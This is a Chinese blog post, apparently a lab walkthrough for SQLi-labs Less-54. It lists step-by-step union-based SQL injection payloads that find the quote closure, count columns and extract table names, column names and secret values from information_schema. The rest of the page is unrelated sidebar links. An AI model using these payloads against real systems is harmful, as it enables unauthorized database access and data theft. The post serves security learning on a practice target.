当前位置:网站首页>SQL注入 Less54(限制次数的SQL注入+union注入)
SQL注入 Less54(限制次数的SQL注入+union注入)
2022-07-31 22:34:00 【华为云】

限制次数的SQL注入
每次reset,数据库的表名、字段名和数据都会发生改变
?id=1
?id=1'
发现没有报错信息
?id=1"
回显正常,直接排查双引号开头的闭合方式
?id=1'--+?id=1')--+?id=1'))--+
单引号回显正常,所以是单引号闭合
?id=1' order by 3--+ 回显正常?id=1' order by 4--+ 回显错误
所以有三列
?id=-1' union select 1,version(),database()--+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+

?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+

边栏推荐
- Implementation of a sequence table
- #yyds dry goods inventory# Interview must brush TOP101: the entry node of the ring in the linked list
- iNeuOS industrial Internet operating system, equipment operation and maintenance business and "low-code" form development tools
- 如何导入 Golang 外部包并使用它?
- MySQL数据库‘反斜杠\’ ,‘单引号‘’,‘双引号“’,‘null’无法存储
- Pytest初体验
- Write a database document management tool based on WPF repeating the wheel (1)
- (26)Blender源码分析之顶层菜单的关于菜单
- Unity-通过预制件和克隆方法动态实现各个UGUI下控件的创建和显示
- I don't know what to do with sync issues
猜你喜欢
Dry goods | 10 tips for MySQL add, delete, change query performance optimization

A high-quality WordPress download site template theme developed abroad

嵌入式开发没有激情了,正常吗?

Realization of character makeup

Structure of the actual combat battalion module eight operations

Unity - by casting and cloning method dynamic control under various UGUI create and display

嵌入式开发没有激情了,正常吗?

C#中引用类型的变量做为参数在方法调用时加不加 ref 关键字的不同之处

二叉树非递归遍历

Realize serial port receiving data based on STM32 ring queue
随机推荐
基于RT1052 Aworks nanopb string 类型固定长度使用方式(二十七)
[Code Hoof Set Novice Village 600 Questions] Merge two numbers without passing a character array
Golang - from entry to abandonment
The article you worked so hard to write may not be your original
Qualcomm cDSP simple programming example (to query Qualcomm cDSP usage, signature), RK3588 npu usage query
[QNX Hypervisor 2.2 User Manual]9.14 set
IDA PRO中汇编结构体识别
Fixed-length usage of nanopb string type based on RT1052 Aworks (27)
不知道该怎么办的同步问题
server certificate verification failed. CAfile: /etc/ssl/certs/ca-certificates.crt CRLfile: none failed
Realization of character makeup
#yyds干货盘点# 面试必刷TOP101:链表中环的入口结点
Binary tree non-recursive traversal
Bionic caterpillar robot source code
Learn about C# anonymous methods
The latest masterpiece!Alibaba just released the interview reference guide (Taishan version), I just brushed it for 29 days
Audio alignment using cross-correlation
什么是客户画像管理?
Structure of the actual combat battalion module eight operations
二叉树非递归遍历